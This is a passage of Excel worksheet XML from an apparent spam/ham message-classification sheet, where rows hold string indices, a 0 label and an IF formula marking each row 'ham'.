        <v>ham</v>
      </c>
    </row>
    <row r="2633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2633" t="s">
        <v>2099</v>
      </c>
      <c r="B2633">
        <v>0</v>
      </c>
      <c r="C2633" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2634" t="s">
        <v>2100</v>
      </c>
      <c r="B2634">
        <v>0</v>
      </c>
      <c r="C2634" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2635" t="s">
        <v>2101</v>
      </c>
      <c r="B2635">
        <v>0</v>
      </c>
      <c r="C2635" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2636" t="s">
        <v>2102</v>
      </c>
      <c r="B2636">
        <v>0</v>
      </c>
      <c r="C2636" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2637" t="s">
        <v>2103</v>
      </c>
      <c r="B2637">
        <v>0</v>
      </c>
      <c r="C2637" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2638" t="s">
        <v>2104</v>
      </c>
      <c r="B2638">
        <v>0</v>
      </c>
      <c r="C2638" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2639" t="s">
        <v>2105</v>
      </c>
      <c r="B2639">
        <v>0</v>
      </c>
      <c r="C2639" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2640" t="s">
        <v>2106</v>
      </c>
      <c r="B2640">
        <v>0</v>
      </c>
      <c r="C2640" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2641" t="s">
        <v>2107</v>
      </c>
      <c r="B2641">
        <v>0</v>
      </c>
      <c r="C2641" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2642" t="s">
        <v>2108</v>
      </c>
      <c r="B2642">
        <v>0</v>
      </c>
      <c r="C2642" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2643" t="s">
        <v>2109</v>
      </c>
      <c r="B2643">
        <v>0</v>
      </c>
      <c r="C2643" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2644" t="s">
        <v>2110</v>
      </c>
      <c r="B2644">
        <v>0</v>
      </c>
      <c r="C2644" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2645" t="s">
        <v>2111</v>
      </c>
      <c r="B2645">
        <v>0</v>
      </c>
      <c r="C2645" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2646" t="s">
        <v>2112</v>
      </c>
      <c r="B2646">
        <v>0</v>
      </c>
      <c r="C2646" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2647" t="s">
        <v>2113</v>
      </c>
      <c r="B2647">
        <v>0</v>
      </c>
      <c r="C2647" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2648" t="s">
        <v>2114</v>
      </c>
      <c r="B2648">
        <v>0</v>
      </c>
      <c r="C2648" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2649" t="s">
        <v>2115</v>
      </c>
      <c r="B2649">
        <v>0</v>
      </c>
      <c r="C2649" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2650" t="s">
        <v>2116</v>
      </c>
      <c r="B2650">
        <v>0</v>
      </c>
      <c r="C2650" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2651" t="s">
        <v>2117</v>
      </c>
      <c r="B2651">
        <v>0</v>
      </c>
      <c r="C2651" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2652" t="s">
        <v>2118</v>
      </c>
      <c r="B2652">
        <v>0</v>
      </c>
      <c r="C2652" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2653" t="s">
        <v>2119</v>
      </c>
      <c r="B2653">
        <v>0</v>
      </c>
      <c r="C2653" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2654" t="s">
        <v>2120</v>
      </c>
      <c r="B2654">
        <v>0</v>
      </c>
      <c r="C2654" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2655" t="s">
        <v>2121</v>
      </c>
      <c r="B2655">
        <v>0</v>
      </c>
      <c r="C2655" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2656" t="s">
        <v>2122</v>
      </c>
      <c r="B2656">
        <v>0</v>
      </c>
      <c r="C2656" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2657" t="s">
        <v>2123</v>
      </c>
      <c r="B2657">
        <v>0</v>
      </c>
      <c r="C2657" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2658" t="s">
        <v>2124</v>
      </c>
      <c r="B2658">
        <v>0</v>
      </c>
      <c r="C2658" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2659" t="s">
        <v>2125</v>
      </c>
      <c r="B2659">
        <v>0</v>
      </c>
      <c r="C2659" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2660" t="s">
        <v>2126</v>
      </c>
      <c r="B2660">
        <v>0</v>
      </c>
      <c r="C2660" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2661" t="s">
        <v>2127</v>
      </c>
      <c r="B2661">
        <v>0</v>
      </c>
      <c r="C2661" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2662" t="s">
        <v>2128</v>
      </c>
      <c r="B2662">
        <v>0</v>
      </c>
      <c r="C2662" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2663" t="s">
        <v>2129</v>
      </c>
      <c r="B2663">
        <v>0</v>
      </c>
      <c r="C2663" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2664" t="s">
        <v>2130</v>
      </c>
      <c r="B2664">
        <v>0</v>
      </c>
      <c r="C2664" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2665" t="s">
        <v>2131</v>
      </c>
      <c r="B2665">
        <v>0</v>
      </c>
      <c r="C2665" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2666" t="s">
        <v>2132</v>
      </c>
      <c r="B2666">
        <v>0</v>
      </c>
      <c r="C2666" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2667" t="s">
        <v>2133</v>
      </c>
      <c r="B2667">
        <v>0</v>
      </c>
      <c r="C2667" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2668" t="s">
        <v>2134</v>
      </c>
      <c r="B2668">
        <v>0</v>
      </c>
      <c r="C2668" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2669" t="s">
        <v>2135</v>
      </c>
      <c r="B2669">
        <v>0</v>
      </c>
      <c r="C2669" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2670" t="s">
        <v>2136</v>
      </c>
      <c r="B2670">
        <v>0</v>
      </c>
      <c r="C2670" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2671" t="s">
        <v>2137</v>
      </c>
      <c r="B2671">
        <v>0</v>
      </c>
      <c r="C2671" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2672" t="s">
        <v>21</v>
      </c>
      <c r="B2672">
        <v>0</v>
      </c>
      <c r="C2672" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2673" t="s">
        <v>2138</v>
      </c>
      <c r="B2673">
        <v>0</v>
      </c>
      <c r="C2673" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2674" t="s">
        <v>2139</v>
      </c>
      <c r="B2674">
        <v>0</v>
      </c>
      <c r="C2674" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2675" t="s">
        <v>2140</v>
      </c>
      <c r="B2675">
        <v>0</v>
      </c>
      <c r="C2675" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2676" t="s">
        <v>2141</v>
      </c>
      <c r="B2676">
        <v>0</v>
      </c>
      <c r="C2676" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2677" t="s">
        <v>2142</v>
      </c>
      <c r="B2677">
        <v>0</v>
      </c>
      <c r="C2677" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2678" t="s">
        <v>2143</v>
      </c>
      <c r="B2678">
        <v>0</v>
      </c>
      <c r="C2678" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2679" t="s">
        <v>2144</v>
      </c>
      <c r="B2679">
        <v>0</v>
      </c>
      <c r="C2679" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2680" t="s">
        <v>2145</v>
      </c>
      <c r="B2680">
        <v>0</v>
      </c>
      <c r="C2680" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2681" t="s">
        <v>2146</v>
      </c>
      <c r="B2681">
        <v>0</v>
      </c>
      <c r="C2681" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2682" t="s">
        <v>2147</v>
      </c>
      <c r="B2682">
        <v>0</v>
      </c>
      <c r="C2682" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2683" t="s">
        <v>2148</v>
      </c>
      <c r="B2683">
        <v>0</v>
      </c>
      <c r="C2683" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2684" t="s">
        <v>2149</v>
      </c>
      <c r="B2684">
        <v>0</v>
      </c>
      <c r="C2684" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2685" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2685" t="s">
        <v>2149</v>
      </c>
      <c r="B2685">
        <v>0</v>
      </c>
      <c r="C2685" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2686" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2686" t="s">
        <v>2150</v>
      </c>
      <c r="B2686">
        <v>0</v>
      </c>
      <c r="C2686" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2687" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2687" t="s">
        <v>2151</v>
      </c>
      <c r="B2687">
        <v>0</v>
      </c>
      <c r="C2687" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2688" t="s">
        <v>2152</v>
      </c>
      <c r="B2688">
        <v>0</v>
      </c>
      <c r="C2688" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2689" t="s">
        <v>2153</v>
      </c>
      <c r="B2689">
        <v>0</v>
      </c>
      <c r="C2689" t="str">
        <f t="shared" si="41"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2690" t="s">
        <v>2154</v>
      </c>
      <c r="B2690">
        <v>0</v>
      </c>
      <c r="C2690" t="str">
        <f t="shared" ref="C2690:C2753" si="42">IF(B2690="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2691" t="s">
        <v>2155</v>
      </c>
      <c r="B2691">
        <v>0</v>
      </c>
      <c r="C2691" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2692" t="s">
        <v>2156</v>
      </c>
      <c r="B2692">
        <v>0</v>
      </c>
      <c r="C2692" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2693" t="s">
        <v>2157</v>
      </c>
      <c r="B2693">
        <v>0</v>
      </c>
      <c r="C2693" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2694" t="s">
        <v>2158</v>
      </c>
      <c r="B2694">
        <v>0</v>
      </c>
      <c r="C2694" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2695" t="s">
        <v>2159</v>
      </c>
      <c r="B2695">
        <v>0</v>
      </c>
      <c r="C2695" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2696" t="s">
        <v>2160</v>
      </c>
      <c r="B2696">
        <v>0</v>
      </c>
      <c r="C2696" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2697" t="s">
        <v>2161</v>
      </c>
      <c r="B2697">
        <v>0</v>
      </c>
      <c r="C2697" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2698" t="s">
        <v>2162</v>
      </c>
      <c r="B2698">
        <v>0</v>
      </c>
      <c r="C2698" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2699" t="s">
        <v>2163</v>
      </c>
      <c r="B2699">
        <v>0</v>
      </c>
      <c r="C2699" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2700" t="s">
        <v>2164</v>
      </c>
      <c r="B2700">
        <v>0</v>
      </c>
      <c r="C2700" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2701" t="s">
        <v>2165</v>
      </c>
      <c r="B2701">
        <v>0</v>
      </c>
      <c r="C2701" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2702" t="s">
        <v>2166</v>
      </c>
      <c r="B2702">
        <v>0</v>
      </c>
      <c r="C2702" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2703" t="s">
        <v>2167</v>
      </c>
      <c r="B2703">
        <v>0</v>
      </c>
      <c r="C2703" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2704" t="s">
        <v>2168</v>
      </c>
      <c r="B2704">
        <v>0</v>
      </c>
      <c r="C2704" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2705" t="s">
        <v>2169</v>
      </c>
      <c r="B2705">
        <v>0</v>
      </c>
      <c r="C2705" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2706" t="s">
        <v>2170</v>
      </c>
      <c r="B2706">
        <v>0</v>
      </c>
      <c r="C2706" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2707" t="s">
        <v>2171</v>
      </c>
      <c r="B2707">
        <v>0</v>
      </c>
      <c r="C2707" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2708" t="s">
        <v>2172</v>
      </c>
      <c r="B2708">
        <v>0</v>
      </c>
      <c r="C2708" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2709" t="s">
        <v>2173</v>
      </c>
      <c r="B2709">
        <v>0</v>
      </c>
      <c r="C2709" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2710" t="s">
        <v>2174</v>
      </c>
      <c r="B2710">
        <v>0</v>
      </c>
      <c r="C2710" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2711" t="s">
        <v>2175</v>
      </c>
      <c r="B2711">
        <v>0</v>
      </c>
      <c r="C2711" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2712" t="s">
        <v>2176</v>
      </c>
      <c r="B2712">
        <v>0</v>
      </c>
      <c r="C2712" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2713" t="s">
        <v>2177</v>
      </c>
      <c r="B2713">
        <v>0</v>
      </c>
      <c r="C2713" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2714" t="s">
        <v>2178</v>
      </c>
      <c r="B2714">
        <v>0</v>
      </c>
      <c r="C2714" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2715" t="s">
        <v>2179</v>
      </c>
      <c r="B2715">
        <v>0</v>
      </c>
      <c r="C2715" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2716" t="s">
        <v>2180</v>
      </c>
      <c r="B2716">
        <v>0</v>
      </c>
      <c r="C2716" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2717" t="s">
        <v>2181</v>
      </c>
      <c r="B2717">
        <v>0</v>
      </c>
      <c r="C2717" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2718" t="s">
        <v>2182</v>
      </c>
      <c r="B2718">
        <v>0</v>
      </c>
      <c r="C2718" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2719" t="s">
        <v>2183</v>
      </c>
      <c r="B2719">
        <v>0</v>
      </c>
      <c r="C2719" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2720" t="s">
        <v>2184</v>
      </c>
      <c r="B2720">
        <v>0</v>
      </c>
      <c r="C2720" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2721" t="s">
        <v>2185</v>
      </c>
      <c r="B2721">
        <v>0</v>
      </c>
      <c r="C2721" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2722" t="s">
        <v>2186</v>
      </c>
      <c r="B2722">
        <v>0</v>
      </c>
      <c r="C2722" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2723" t="s">
        <v>2187</v>
      </c>
      <c r="B2723">
        <v>0</v>
      </c>
      <c r="C2723" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2724" t="s">
        <v>2188</v>
      </c>
      <c r="B2724">
        <v>0</v>
      </c>
      <c r="C2724" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2725" t="s">
        <v>2189</v>
      </c>
      <c r="B2725">
        <v>0</v>
      </c>
      <c r="C2725" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2726" t="s">
        <v>2190</v>
      </c>
      <c r="B2726">
        <v>0</v>
      </c>
      <c r="C2726" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2727" t="s">
        <v>2191</v>
      </c>
      <c r="B2727">
        <v>0</v>
      </c>
      <c r="C2727" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2728" t="s">
        <v>2192</v>
      </c>
      <c r="B2728">
        <v>0</v>
      </c>
      <c r="C2728" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2729" t="s">
        <v>2193</v>
      </c>
      <c r="B2729">
        <v>0</v>
      </c>
      <c r="C2729" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2730" t="s">
        <v>2194</v>
      </c>
      <c r="B2730">
        <v>0</v>
      </c>
      <c r="C2730" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2731" t="s">
        <v>2195</v>
      </c>
      <c r="B2731">
        <v>0</v>
      </c>
      <c r="C2731" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2732" t="s">
        <v>2196</v>
      </c>
      <c r="B2732">
        <v>0</v>
      </c>
      <c r="C2732" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2733" t="s">
        <v>2197</v>
      </c>
      <c r="B2733">
        <v>0</v>
      </c>
      <c r="C2733" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2734" t="s">
        <v>2198</v>
      </c>
      <c r="B2734">
        <v>0</v>
      </c>
      <c r="C2734" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2735" t="s">
        <v>2199</v>
      </c>
      <c r="B2735">
        <v>0</v>
      </c>
      <c r="C2735" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2736" t="s">
        <v>2200</v>
      </c>
      <c r="B2736">
        <v>0</v>
      </c>
      <c r="C2736" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2737" t="s">
        <v>2201</v>
      </c>
      <c r="B2737">
        <v>0</v>
      </c>
      <c r="C2737" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2738" t="s">
        <v>2202</v>
      </c>
      <c r="B2738">
        <v>0</v>
      </c>
      <c r="C2738" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2739" t="s">
        <v>2203</v>
      </c>
      <c r="B2739">
        <v>0</v>
      </c>
      <c r="C2739" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2740" t="s">
        <v>2204</v>
      </c>
      <c r="B2740">
        <v>0</v>
      </c>
      <c r="C2740" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2741" t="s">
        <v>2205</v>
      </c>
      <c r="B2741">
        <v>0</v>
      </c>
      <c r="C2741" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2742" t="s">
        <v>2206</v>
      </c>
      <c r="B2742">
        <v>0</v>
      </c>
      <c r="C2742" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2743" t="s">
        <v>2207</v>
      </c>
      <c r="B2743">
        <v>0</v>
      </c>
      <c r="C2743" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2744" t="s">
        <v>2208</v>
      </c>
      <c r="B2744">
        <v>0</v>
      </c>
      <c r="C2744" t="str">
        <f t="shared" si="42"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2745" t="s">
        <v>2209</v>
